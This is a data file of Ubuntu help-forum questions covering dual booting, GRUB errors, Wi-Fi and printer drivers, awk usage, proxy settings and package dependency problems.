437165	trying to install ubuntu on external hd , but says missing os	i am trying to come back to linux after switching computers , but am having trouble installing ubuntu . the external hard drive works with universal usb installer ( including preformatting it to fat32 ) , but when i try to boot it it says that it is missing an os . i even tried using my flash drive to install it on the internal hd and the external hd , but neither worked . -thanks for even reading my essay , bayf
437166	problems with us.archive.ubuntu.com ca n't upgrade/update	i have this problem , i ca n't update/upgrade , i 'm using a static ip and through wifi and my eth0 is setted and in theory connected to the internet , but does n't go outside my network aparently , i 'm using ubuntu server 12.04 before you say it , yes i 'm using it to test a server before installing it on the wired one . if this answer is repeated ( even i try to search about it already ) please leave the link like an answer or the exact name of the question , thanks in advance . i 'm kinda new on this thanks in advance
437168	play subtitle on online streaming movies	i want a player which can play subtitles while i am watching online movies . i have tried vlc network streaming . it 's not happening . well , there is a windows app called greenfish subtitle player , which allows me to play subtitles on top of my browser , but it is not available for ubuntu . is there any software like this ? edit : i have found a similar question but it is from 2012 and does n't quite fit my requirement : subtitle players like greenfish .
437171	adobe source code pro has two extensions ?	i found a thread that explained how to install the adobe source code pro font here : how to use the new adobe source code pro font ? i followed the instructions , logged out and logged back in , opened libreoffice writer , and the font still was n't available . one thing i noticed that i do n't understand is that the ttf and otf fonts have .woff extensions . so the extensions are .otf.woff and .ttf.woff . i do n't actually see any naked .otf or .ttf extensions . just deleting the .woff out of the filename does n't seem to fix anything . am i missing something fundamental ? i 'm a total ubuntu newbie . do i need to drag the entire folder for the `` .fonts '' folder to recognize it as a family ?
437173	tata docomo zte mf190 not detected in ubuntu 12.04 64bit	i bought a tata photon 3g mobile broadband usb stick ( model zte mf190 ) . it 's working with ubuntu 12.04 32bit , but i am not able to connect it to 12.04 64bit machine . i was trying from last 15days . please suggest me the best solution : ) here is what i tried : sudo apt-get purge usb-modeswitch sudo apt-get update sudo apt-get install usb-modeswitch sudo apt-get update gksudo gedit /lib/udev/rules.d/40-usb_modeswitch.rules then , copy below mentioned lines # zte mf190 attrs { idvendor } == '' 19d2 '' , attrs { idproduct } == '' 0154 '' , run+= '' usb_modeswitch ' % b/ % k ' '' saved and restarted , but does n't work .
437174	how to configure socks5 proxy in irssi	i have been trying to configure irssi to run through a socks 5 proxy . in the documnetation there is no mention of how to use a socks5 proxy . some threads the net say it can be done but there is no mention on how to do it . also , these threads are atleast 3 to 4 years old . i even tried running irssi through tsocks but it does not seem to be working so , is it even possible to run irssi through a socks5 proxy and if so how do i do it ?
437178	failed to boot windows 7 after installing ubuntu 12.04 , invalid efi file path	first i installed windows 7 64-bit , then i installed ubuntu 12.04 64-bit . when installing ubuntu , i found my bios was uefi , so i installed ubuntu like this : https : //help.ubuntu.com/community/uefi now my problem is when i reboot , i ca n't boot into windows 7. error : invalid efi file path what should i do ? this was the grub.cfg : menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 66d0bba6d0bb7b3f chainloader +1 }
437179	booting error : `` hd0 out of disk ''	my computer has this issue where every once in a while , instead of loading grub and sending me to the os menu , it just spaces out for a couple of seconds , sending me to the grub rescue prompt with the message `` hd0 out of disk '' . this happens every once in a while , and it usually stops happening in a couple of hours each time , but this time it 's not going away . i tried restoring grub with supergrubdisk but when repairing grub the following sdg message appears : `` error 15 : file not found '' . when in the grub repair promp , running the `` ls '' command makes the following appear on screen : ( hd0 ) , ( hd0 , msdos6 ) , ( hd0 , msdos5 ) , ( hd0 , msdos3 ) , ( hd0 , msdos2 ) , ( hd0 , msdos1 ) does anyone know a fix ? thank you in advance
437180	search for files and delete from the whole system file	search for files and delete from the whole system file if you create a file or just open a file with some programs like gedit , it will make auto save files named like this file~ . for example if i do this gedit file.txt then when i close the file i can find two files file.txt and file.txt~ . what i want to do is to search the `` / '' whole file system for these files and then delete them . note that those files could be other things not just text files.thanks foe helping
437182	how to check the current value of ifs ?	i am currently running a shell script and i suspect the problem may be because i accidentally changed the default value of ifs which is a space to something else . i want to check the current value of ifs , but i do n't know how to go about finding it . i am running my ubuntu on vmware .
437184	how can i get boot menu after ubuntu installation ?	i would like to thank you for taking the time to read this . my problem : i tried to install ubuntu 12.04.4 lts on a system in my lab but after the installation when i restarted the system it booted straight to windows . i restarted it many times but i did not get a boot option to load ubuntu . during the installation i do remember the installer showing that it was installing grub so i want to know how i can boot to ubuntu . the system i used has windows 7 enterprise edition . i created 100 gb partition ( /dev/sda6 ) and a 5gb swap partition ( /dev/sda7 ) before installing ubuntu in the 100 gb partition . i chose /dev/sda for boot loader installation . before installation i noticed that there already was a 26 gb ext4 partition so i am guessing that someone had previously tried installing linux on this system . anyway i needed more space so i carried out my installation in the 100gb partition . i have tried all different boot orders possible in the bios , i have tried re-formatting and re-installing ubuntu but it still boots into windows directly . in windows , system and security → system → advanced system settings → advanced → startup & recovery → settings : lists windows 7 as the default os and does n't give me a choice to select ubuntu in the drop down menu . i have tried the recommended repair in boot-repair but it gives me an error : boot repair : please open a terminal and type this : sudo chroot `` /mnt/boot-sav/sda6 '' dpkg -- configure -a sudo chroot `` /mnt/boot-sav/sda6 '' apt-get install -fy sudo chroot `` /mnt/boot-sav/sda6 '' apt-get purge -y -- force-yes grub* shim-signed i type them but nothing seems to happen . then when i click the forward button i get this message : grub is still present . please try again . i have used boot-repair to make a boot-info summary please tell me how to proceed . thanks .
437185	wifi not working after suspend/screen off ubuntu 14.04	yesterday i installed ubuntu 14.04 64-bit daily build and got this problem . there was n't any problem in 13.10 . i have a dell latitude d630 with intel wifi , driver : iwl4965 . i have tried the solution mentioned at http : //www.webupd8.org/2013/01/fix-wireless-or-wired-network-not.html but its not working . here is the output of sudo lshw -c network : *-network description : wireless interface product : pro/wireless 4965 ag or agn [ kedron ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:0c:00.0 logical name : wlan0 version : 61 serial : 00:1f:3b : d3 : ce:01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl4965 driverversion=3.13.0-18-generic firmware=228.61.2.24 ip=192.168.1.3 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:44 memory : fe8fe000-fe8fffff
437186	i get the following error glib-gio-error ** settings schema 'org.gnome.desktop.interface ' is not installed	when i run the command : sudo apt-get install gsettings-desktop-schemas i get this : reading dependency tree ... done building dependency tree reading state information ... done gsettings-desktop-schemas is already the newest version . the following packages were automaticaly installed and are no longer required : gir1.2-ubuntuonevi-3.0 libubuntuonevi-3.0-1 use 'apt-get autoremove ' to remove them . 0 ugraded , 0 newly installed , 0 to remove and 0 not upgraded . it tells me that i am missing the gsettings and when i install them it tells me that i already have them with none updates . i am running ubuntu 12.04 lts . im trying to run quickly `` quikly run '' command to open the page preview . after i run : quickly create ubuntu-application mybrowser i access it : cd /mybrowser then when im inside and i want to run `` quicky run '' command the following error pops up ( mybrowser:5425 ) : glib-gio-error ** : settings schema 'org.gnome.desktop.interface ' is not installed
437190	vm runs very slow using qemu	when i create virtual machine using qemu-system-x86_64 , it does n't even boot up . this is how i boot the vm : qemu-system-x86_64 -m 1024 -name mac -hda ~/documents/ubuntu1 but when i create the same vm with oracle virtualbox or vmware player , it runs fine . what is the issue with qemu and how do i resolve it ?
437192	install error -- -make : *** no targets specified and no makefile found . stop	apcoer @ apcoer-aspire-series : ~ $ cd desktop apcoer @ apcoer-aspire-series : ~/desktop $ cd libgraph-1.0.2 apcoer @ apcoer-aspire-series : ~/desktop/libgraph-1.0.2 $ ./configure checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking target system type ... x86_64-unknown-linux-gnu checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking for gcc ... gcc checking for c compiler default output file name ... a.out checking whether the c compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept ansi c ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking how to run the c preprocessor ... gcc -e checking for a bsd-compatible install ... /usr/bin/install -c checking whether ln -s works ... yes checking whether make sets $ ( make ) ... ( cached ) yes checking for a sed that does not truncate output ... /bin/sed checking for egrep ... grep -e checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for /usr/bin/ld option to reload object files ... -r checking for bsd-compatible nm ... /usr/bin/nm -b checking how to recognise dependent libraries ... pass_all checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking dlfcn.h usability ... yes checking dlfcn.h presence ... yes checking for dlfcn.h ... yes checking for g++ ... no checking for c++ ... no checking for gpp ... no checking for acc ... no checking for cc ... no checking for cxx ... no checking for cc++ ... no checking for cl ... no checking for fcc ... no checking for kcc ... no checking for rcc ... no checking for xlc_r ... no checking for xlc ... no checking whether we are using the gnu c++ compiler ... no checking whether g++ accepts -g ... no checking dependency style of g++ ... none checking how to run the c++ preprocessor ... /lib/cpp configure : error : c++ preprocessor `` /lib/cpp '' fails sanity check see `config.log ' for more details . apcoer @ apcoer-aspire-series : ~/desktop/libgraph-1.0.2 $ apcoer @ apcoer-aspire-series : ~/desktop/libgraph-1.0.2 $ apcoer @ apcoer-aspire-series : ~/desktop/libgraph-1.0.2 $ sudo make [ sudo ] password for apcoer : make : *** no targets specified and no makefile found . stop . apcoer @ apcoer-aspire-series : ~/desktop/libgraph-1.0.2 $ can anyone solve this error urgently ... ?
437193	blurry screen ( windows is normal )	okay , i 've installed ubuntu today . i 've been using it at university but i have came across an annoying problem . the screen is just blurry compared to my windows os . something must be wrong here . all my nvidia drivers have been installed at the beginning of the os installation . what should i do to make it look like windows so i finally could look at the screen without hurting my eyes .
437197	ubuntu hide desktop icon problem ubuntu 13.10	i am facing the scenario as below whenever i try to hide the desktop icon for ubuntu 13.10 . when my default file manager is set to nautilus , everything is working fine even after i set the desktop icon to `` hide '' from ubuntu tweak tool . problem is when i set my default file manager ( xdg-mime default nemo.desktop inode/directory application/x-gnome-saved-search ) to either nemo or caja , whenever the file manager start , the desktop will be shown with icon and i will need to manually kill the file manager process for the desktop icon to be hidden again . any advice on what is the cause of this ? regards and thank you , roger .
437198	what is the command to display the last ten lines in file : /var/log/syslog	i want to know what is the command to display the last ten lines in file : /var/log/syslog
437200	script to run audacity on a schedule	after reading the doc and wiki for audacity , i see there is a timer recording feature , which is exactly what i need , however , i do not see an option for recurring record sessions . is there a way to have audacity record for a set time , say 24 hours , export the audio , and start over with another 24 hour recording ? i need this cycle to be perpetual . i apologize if this has been covered somewhere before , but i was unable to locate any information on this .
437201	help with the installation of ubuntu 13.10	i 'm trying to download ubuntu 13.10 on my laptop which is currently running windows 7 . i want to install to where i can dual boot either .
437205	the x11 library libxp.so does not exist in ubuntu 12.04.4	i am installing matlab 2010 in ubuntu 12.04.4 linux . after finishing the installation it is showing that : -- the x11 library libxp.so does not exist and matlab not able to run on this system until the library is installed *
437208	ethernet working but no web browser connection	i can connect via terminal even ping sites as well as install , update packages ; however i can not connect to internet via firefox . on the terminal i tried firefox http : //www.google .com then firefox web browser shows forbidden you do n't have permission to access/ on this server . additionally , a 403 forbidden error was encountered while trying to use an errordocument to handle the request .
437209	how to remove redirection unexpected syntax errors	i am loading using ubuntu for beagleboard-xm sd card partition so after last stage of partition i have entered a command like this ./omap3-mkcard.sh /dev/sdx i have got ti-lab @ kilby : ~/angstrom-wrk $ ./omap3-mkcard.sh /dev/sdx ./omap3-mkcard.sh : line 1 : syntax error near unexpected token ` < ' ./omap3-mkcard.sh : line 1 : ` < html > < head > ' ./omap3-mkcard.sh : syntax error : redirection unexpected bash : ./omap3-mkcard.sh : : no such file or directory so how can i rectify this problem please help me
437210	installing ubuntu in pen drive without disturbing windows xp	i am a newbie to ubuntu . is it possible to install and run ubuntu in pen drive or external hard disk without disturbing windows xp on my laptop ? i do n't mind dual boot for running ubuntu or windows xp whenever required , but do n't want to install ubuntu in the internal hard disk in which xp is installed .
437211	dual boot 2 hard drives . ubuntu 13.10 and windows 8.1 64-bit	dual boot 2 hard drives . can you : install ubuntu on hard drive # 1 take out drive # 1 and then install windows 8.1 on drive # 2 install both drives and then pick which one to boot from on start up ? i prefer if at all possible to leave the drives `` clean '' installs that do not link to each other . this way at any time i can remove one drive or the other and have a perfectly normal environment . i would even go so far as to have a bootable usb key ( or even a 3rd drive ) that handled the selection of boot drive . i imagine i could pick a drive from the bios boot menu but a cool chameleon like boot manager would be nice . i used to do this back in the old days and it was a really nice set up . http : //ubuntuforums.org/showthread.php ? t=179902 thank you , -- stevenkw
437212	kill a process of a user whose username start with a particular prefix ?	i want kill specified process of all users in my ubuntu whose username sytarting with 'cs ' and 'ec'
437219	ca n't watch flash content in lubuntu	i ca n't watch flash content in firefox . can someone please help me ? i am sorry if this has already been addressed , but i have visited numerous forum posts and tried several different things . my computer is a compaq presario 2195us . the processor is athlon xp 2500+ os is lubuntu , 13.10 . i had to install it via the alternate installer because for some reason the normal lubuntu installer did n't work . i had a black screen with the little thing going around and around forever . once i installed lubuntu , i opened firefox and tried to watch flash stuff on youtube . the page loaded but the player did not show up ... that part of the screen was blank . i then tried watching a youtube video which i knew was html 5 , and that worked . ( vihart pi rant ) so i installed lubuntu-restricted-extras . after that , i could n't watch any youtube videos at all , not even html5 . then i tried installing flash directly , using the terminal ( same way i installed the restricted extras ) and it said could not find the specified flash package , and then i tried it a different way and it said the flash package was already installed . i guess that was due to the restricted extras which i had already installed . i then tried installing chrome 19 , but that did not work ... it said failed to satisfy dependency libuv0 or something . so i installed libuv0 from some link , and tried to install chrome again , and then the installer just crashed . then i went to https : //support.mozilla.org/en-us/questions/964567 and tried following the instructions . it was weird because it told me to put the .so file in usr/lib/mozilla /plugins but i did n't have such a folder my user name is herb , and i did not have a /herb/lib/mozilla/plugins folder either ... so , i made /herb/lib/mozilla/plugins and put the .so file in there ( with the name of the file changed as they recommend ) ... still could n't play flash though ... btw i did use ctrl+h when looking for that folder as you can see i am very confused . your help would be much appreciated by me and my 5-year old daughter . i am doing this so she can do her kids educational websites like starfall , which requires flash . however , i am also doing this because it 's fun ! i think i am close to being able to do what i want . btw , before lubuntu i had ubuntu 12.04 on here . i just switched so it would be faster . another random fact : the computer was shutting down randomly , but i think it was because i was accidentally blocking the intake vent for the processor fan . now that i am not blcoking it anymore , it 's not shutting down randomly .
437220	new with ubuntu . which one must i install ?	today i will receive a free and clear pc and o would like to introduce myself in linux world , but i do not know which version must i install , 12.04 or 13.10 ? could anybody help me please ? thank you in advance
437224	list all non system users	i want to know list of all users founded in my system . i need non-system users . i know that the file /etc/passwd contains all users root : x:0:0 : root : /root : /bin/bash daemon : x:1:1 : daemon : /usr/sbin : /bin/sh bin : x:2:2 : bin : /bin : /bin/sh sys : x:3:3 : sys : /dev : /bin/sh sync : x:4:65534 : sync : /bin : /bin/sync games : x:5:60 : games : /usr/games : /bin/sh man : x:6:12 : man : /var/cache/man : /bin/sh lp : x:7:7 : lp : /var/spool/lpd : /bin/sh mail : x:8:8 : mail : /var/mail : /bin/sh news : x:9:9 : news : /var/spool/news : /bin/sh uucp : x:10:10 : uucp : /var/spool/uucp : /bin/sh proxy : x:13:13 : proxy : /bin : /bin/sh www-data : x:33:33 : www-data : /var/www : /bin/sh backup : x:34:34 : backup : /var/backups : /bin/sh list : x:38:38 : mailing list manager : /var/list : /bin/sh irc : x:39:39 : ircd : /var/run/ircd : /bin/sh gnats : x:41:41 : gnats bug-reporting system ( admin ) : /var/lib/gnats : /bin/sh nobody : x:65534:65534 : nobody : /nonexistent : /bin/sh libuuid : x:100:101 : :/var/lib/libuuid : /bin/sh syslog : x:101:103 : :/home/syslog : /bin/false messagebus : x:102:104 : :/var/run/dbus : /bin/false colord : x:103:108 : colord colour management daemon , , , :/var/lib/colord : /bin/false lightdm : x:104:111 : light display manager : /var/lib/lightdm : /bin/false whoopsie : x:105:114 : :/nonexistent : /bin/false avahi-autoipd : x:106:117 : avahi autoip daemon , , , :/var/lib/avahi-autoipd : /bin/false avahi : x:107:118 : avahi mdns daemon , , , :/var/run/avahi-daemon : /bin/false usbmux : x:108:46 : usbmux daemon , , , :/home/usbmux : /bin/false kernoops : x:109:65534 : kernel oops tracking daemon , , , :/ : /bin/false pulse : x:110:119 : pulseaudio daemon , , , :/var/run/pulse : /bin/false rtkit : x:111:122 : realtimekit , , , :/proc : /bin/false saned : x:112:123 : :/home/saned : /bin/false speech-dispatcher : x:113:29 : speech dispatcher , , , :/var/run/speech-dispatcher : /bin/sh hplip : x:114:7 : hplip system user , , , :/var/run/hplip : /bin/false user1 : x:1000:1000 : user1 , , , :/home/user1 : /bin/bash user2 : x:1001:1001 : user2 , , , :/home/user2 : /bin/bash user3 : x:1002:1002 : user3 , , , :/home/user3 : /bin/bash user4 : x:1003:1003 : user4 , , , :/home/user4 : /bin/bash xrdp : x:115:126 : :/var/run/xrdp : /bin/false lxc-dnsmasq : x:116:128 : lxc dnsmasq , , , :/var/lib/lxc : /bin/false clamav : x:117:129 : :/var/lib/clamav : /bin/false dhcpd : x:118:132 : :/var/run : /bin/false liquidsoap : x:119:133 : :/usr/share/liquidsoap : /bin/false sshd : x:120:65534 : :/var/run/sshd : /usr/sbin/nologin but as you can see the file may come to be very big as you install more services and i ca n't just open and search for non-system users that easily . so i need a simple command to list those users . thanks
437225	how to make terminal settings to default ?	i have accidentally set do n't show menus in terminal preferences and can not open preferences anymore . how to fix this ?
437229	how to check my niceness ?	is there any way to check my nice lvl ? i did try with ps , but for some reason the output does not show the column ni which is meant to show the lvl priority if i 'm not wrong . ps -fl -c f s uid pid ppid cls pri addr sz wchan stime tty time cmd 0 s sebas 9761 26810 ts 19 - 6564 wait 18:07 pts/4 00:00:00 bash 0 r sebas 25389 9761 ts 19 - 5661 - 18:27 pts/4 00:00:00 ps -fl -c
437234	clock is not displayed and consume more power	i just updated win 8 to ubuntu 13.10 ( x64 ) i 'm new user of ubuntu os . i have sony vaio sve15129cns laptop . when i connected to internet , to many updates ware installed and it block my os 's clock tab in time & date window . time is not displayed on desktop.. and it consume more power than windows 8 . is there is any drivers for my laptop plz suggest me .
437239	image optimization with imageoptim using bash . how to get a summary	i am using imageoptim to optimize images on my server . it took me quite some time to learn rudimentary bash scripting to able to optimize all images in all my first level directories . my script looks the following way and from functional point of view it does exactly what i want : for dir in mydir/*/ do sudo jpegoptim -- strip-all -t `` $ dir '' *.jpg done the problem is with aestetic angle . when i run the script it outputs the following : mydir/dir_1/img_1.jpg axb 24bit n jfif [ ok ] 2234 -- > 1861 bytes ( 16.70 % ) , optimized . ... mydir/dir_1/img_16.jpg axb 24bit n jfif [ ok ] 2234 -- > 1861 bytes ( 16.70 % ) , optimized . average compression ( 16 files ) : 7.26 % ( 8k ) mydir/dir_2/img_1.jpg axb 24bit n jfif [ ok ] 2234 -- > 1861 bytes ( 16.70 % ) , optimized . ... mydir/dir_2/img_6.jpg axb 24bit n jfif [ ok ] 2234 -- > 1861 bytes ( 16.70 % ) , optimized . average compression ( 6 files ) : 7.26 % ( 8k ) it outputs the line average compression ( 6 files ) : 7.26 % ( 8k ) because i asked for summary with ( -t ) flag . but i do not want to get all information about each particular resource . when i try to suppress it with -t -q or -tq or -q -t ( i tried them all because i am not sure it it matters ) it showed no information at all . in the very perfect case i just want to see one number - how much size have i saved . because this is my first bash script ( i struggled for an hour with that loop : - ( ) , my skills currently are not sufficient to solve my problem .
437244	can podcast feeds be exported from rhythmbox ?	can podcast feeds be exported from rhythmbox ? i'l like a list of all rss feed addresses that i have subscribed to . thanks .
437245	openerp server problem message when installing an app	i recently installed open erp v7 on ubuntu 13.10 , i could install the warehouse app fine , as well as the sales app , but i 'm having trouble installing a few other apps . it looks like it is either a permission problem ( although i doubt it as the warehouse and sales apps installed without any problem ) or a python related problem . i have no clue on what i must do . any help would be great . here is the message i got below : openerp server error client traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/openerp/addons/web/http.py '' , line 204 , in dispatch response [ `` result '' ] = method ( self , **self.params ) file `` /usr/lib/pymodules/python2.7/openerp/addons/web/controllers/main.py '' , line 1132 , in call_button action = self._call_kw ( req , model , method , args , { } ) file `` /usr/lib/pymodules/python2.7/openerp/addons/web/controllers/main.py '' , line 1120 , in _call_kw return getattr ( req.session.model ( model ) , method ) ( *args , **kwargs ) file `` /usr/lib/pymodules/python2.7/openerp/addons/web/session.py '' , line 42 , in proxy result = self.proxy.execute_kw ( self.session._db , self.session._uid , self.session._password , self.model , method , args , kw ) file `` /usr/lib/pymodules/python2.7/openerp/addons/web/session.py '' , line 30 , in proxy_method result = self.session.send ( self.service_name , method , *args ) file `` /usr/lib/pymodules/python2.7/openerp/addons/web/session.py '' , line 103 , in send raise xmlrpclib.fault ( openerp.tools.ustr ( e ) , formatted_info ) server traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/openerp/addons/web/session.py '' , line 89 , in send return openerp.netsvc.dispatch_rpc ( service_name , method , args ) file `` /usr/lib/pymodules/python2.7/openerp/netsvc.py '' , line 296 , in dispatch_rpc result = exportservice.getservice ( service_name ) .dispatch ( method , params ) file `` /usr/lib/pymodules/python2.7/openerp/service/web_services.py '' , line 626 , in dispatch res = fn ( db , uid , *params ) file `` /usr/lib/pymodules/python2.7/openerp/osv/osv.py '' , line 190 , in execute_kw return self.execute ( db , uid , obj , method , *args , **kw or { } ) file `` /usr/lib/pymodules/python2.7/openerp/osv/osv.py '' , line 132 , in wrapper return f ( self , dbname , *args , **kwargs ) file `` /usr/lib/pymodules/python2.7/openerp/osv/osv.py '' , line 199 , in execute res = self.execute_cr ( cr , uid , obj , method , *args , **kw ) file `` /usr/lib/pymodules/python2.7/openerp/osv/osv.py '' , line 187 , in execute_cr return getattr ( object , method ) ( cr , uid , *args , **kw ) file `` /usr/lib/pymodules/python2.7/openerp/addons/base/module/module.py '' , line 682 , in install_from_urls shutil.move ( os.path.join ( tmp , module_name ) , module_path ) file `` /usr/lib/python2.7/shutil.py '' , line 298 , in move copytree ( src , real_dst , symlinks=true ) file `` /usr/lib/python2.7/shutil.py '' , line 177 , in copytree os.makedirs ( dst ) file `` /usr/lib/python2.7/os.py '' , line 157 , in makedirs mkdir ( name , mode ) oserror : [ errno 13 ] permission denied : '/usr/lib/pymodules/python2.7/openerp/addons/product_custom_attributes'
437248	libpcap not found in /usr/lib or /lib after apt installation	i installed jnetpcap but it showed error that libpcap.so is not found , so i used sudo apt-get install libpcap-dev but when i grep libpcap in /lib and /usr/lib it is not there , am i missing something ?
437250	problems when trying to upgrade from 10.04 to 12.04	when i was trying to upgrade my server from ubuntu 10.04 to 12.04 i was facing problems with some packages . it was saying , sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run `apt-get -f install ' to correct these . the following packages have unmet dependencies : gcc-4.4 : depends : gcc-4.4-base ( = 4.4.7-1ubuntu2 ) but 4.4.3-4ubuntu5.1 is installed depends : cpp-4.4 ( = 4.4.7-1ubuntu2 ) but 4.4.3-4ubuntu5.1 is installed depends : binutils ( > = 2.20.1-15~ ) but 2.20.1-3ubuntu7.1 is installed depends : libgcc1 ( > = 1:4.4.7-1ubuntu2 ) but 1:4.4.3-4ubuntu5.1 is installed recommends : libc6-dev ( > = 2.13-0ubuntu6 ) but it is not installed libnih-dbus1 : depends : libnih1 ( = 1.0.3-4ubuntu9.1 ) but 1.0.1-1 is installed libnih1 : depends : libc6 ( < 2.12 ) but 2.15-0ubuntu10.5 is installed e : unmet dependencies . try using -f. please help !
437251	can a ubuntu computer work on a windows network ?	i have a desktop running windows xp , and i am seriously considering switching to linux/ubuntu once support from ms ends in a few weeks . however , i have other computers in my house , all running relatively more modern variants of windows , and thus part of a windows network . can a ubuntu machine function as part of a windows network ? i know that i should be able to connect to my router via wire/wireless ( although i 'm a bit concerned at the number of questions i see regarding various people 's connectivity issues in ubuntu ) ... i 'm just wondering if i 'll still be able to do folder/file shares , etc . also , if anyone has any suggestions regarding any potential pitfalls i could avoid , that would be great . thanks !
437255	how to install emacs 24.4 on ubuntu ?	emacs is build from the launchpad sources , which is based on the debian emacs-snapshot ( which is not maintained any more ) . the cassou ppa only has 24.3 builds available . do you know any other ways to install it on ubuntu ? maybe some ppas or deb packages ( now i 'm trying to build it from source ) ?
437256	split string with awk and delimiter	i have log file like : 1 : : 10 : : 127.0.0.1 172.17.1.1 i want awk to split string to columns on : : delimiter . some thing like : awk { print $ 1 } and the result : 1 and awk { print $ 2 } and the result : 10 and awk { print $ 3 } and the result : 127.0.0.1 172.17.1.1 i do n't know how split with awk with delimiter : : .
437259	tesseract ocr engine reorganization problem	i 'm trying to use 'tesseract ' on jpg image 's . its seems that it doesnt recognize the number 's and character 's in the command-line currently . but when i use ocrfeeder manually and select the bounds as i want it recognize it right . am new in such field , and yet could n't find/search the right way to use a specific bounds for an image via command line . so.. ive tried python with same result.. incorrect . any idea how can i select a specific bounds of an image ? best regards
437265	printer canon ip 1980 not printing with ubuntu 12.04	i am using ubuntu 12.04 lts , i can not print with printer canon 1900 series , i download the driver already but still not printing , it just say rendering complete when you click the print button but not printing in the paper ...
437269	how to customize the maximum iso-filesize in genisoimage or alternativ programs ?	i 'm working on a systembackup with remastersys and i would like to create a rich live-system on my usb-device ( 32 gb ) - but on my way the genisoimage limits the creation of an huge iso-image files ( but in my case it 's not necessary ! ! ) how can i fix this problem or use an alternative ? thanks !
437271	nis user ca n't do su	i setup a nis client and its working fine but i ca n't do `` su '' as a nis user ( error : wrong passwort - but it 's correct ) . also the login with the local root user is not possible . i only can login as root user in the rescue mode . has anyone an idea how to fix it ?
437272	how to fix overlapped partitions in the mbr table ?	my ubuntu installed on pc is stucked at boot screen . so , i tried to install anew , but partition table is shown empty at installation wizard . i learned that my partitions overlapped . i found this link to fix problem http : //gparted.org/h2-fix-msdos-pt.php . but it does n't seem to make sense for my fdisk output . $ sudo fdisk -l -u /dev/sda disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x49fec944 device boot start end blocks id system /dev/sda1 * 616448 257441624 128412588+ 7 hpfs/ntfs/exfat /dev/sda2 452753408 484210687 15728640 7 hpfs/ntfs/exfat /dev/sda3 484210688 488394751 2092032 c w95 fat32 ( lba ) /dev/sda4 257433598 452753407 97659905 5 extended /dev/sda5 257433600 452753407 97659904 83 linux partition table entries are not in disk order could you help me ?
437273	set ip-routes in networkmanager ?	i 'm executing a connection to a vpn in ubuntu 's networkmanager , which works really fine . as is need the vpn connection only for accessing one ip address , i set networkmanager not to set its default routes . currently after connecting to the vpn i have to open the terminal and add a route from the vpn connection to the specific ip address manually : # route add -host 192.1682.2.62 dev ppp0 is there any way to set networkmanager automatically to do this ? i tried inserting a route into the `` routes '' section of networkmanagers vpn route table , but could n't get it really to work .
437275	installing ruby and rubygems	hi everybody i would like to know is it possible to install ruby and rubygems in apache2 . because i have already a web using apache2 and want to install a fedena which requires ruby and rubygems to work and would like this site to be under main site as a subdomain . thanks in advance for sharing comments .
437277	are there how to transport lldp flames to bridge port ?	( flow image ) l2switch - > ubuntu server ( eth port - > bridge port - > vnet - > âś ) i want to transport lldp flames to server 's bridge port from neigbor l2switch whitch sends lldp . i captured packets by tcpdump . ( on server 's ethernet port and on its bridge port . ) as a result , server 's ethernet port accepted lldp . but its bridge port did n't accept lldp ( =tcpdump did n't show lldp packets ) . are there how to transport lldp flames to bridge port ? please give me some advice .
437278	wireless ( shared ) not active in network-manager	i wanted to share wifi internet using wlan interface . for this , i followed the article at http : //liquidat.wordpress.com/2013/12/19/howto-share-ethernet-via-wifi-with-networkmanager-in-kde/ . the problem i am facing is , it created the ap but does n't get activated . how to activate it ?
437279	refused to set ibus keyboard input method as root	on the ubuntu12.04.3 lts , i want to input chinese as root user , so i tried to configure ibus input framework . but it did n't work . two scenrios that i tried are following : 1 ) by using gnome-terminal when i run gnome-language-selector as root user on the gnome-terminal , i get the output message upon setting keyboard input method system option as ibus . root @ test-optiplex-9020 : ~ # gnome-language-selector no system wide default defined just for locale en_us . use `` all_all '' quasi-locale and set im . update-alternatives : error : alternative /etc/x11/xinit/xinput.d/ibus for xinput-all_all not registered , not setting . as you see above , when i 'm in root user i could n't set ibus at all . 2 ) by using system setting 1st . current result click the language selector icon for switching ims . 2nd . expected . click the keyboard input method system as ibus . after closing the gnome-language-selector dialog , relaunch that . it still shows that keyboard input method system option is always none . hope to fix this problem or bug ! ps . when i run gnome-language-selector as normal user , it works well .
437280	permission issues when saving in /usr/share/gtksourceview-3.0/styles	when i try to save a file in /usr/share/gtksourceview-3.0/styles i get a window telling that the file can not be saved because i ca n't change the contents of that folder . when i right-click on the styles folder and go to permissions tab i come to know that the i am not the owner and thus can not change these permissions . here is a screenshot of this window :
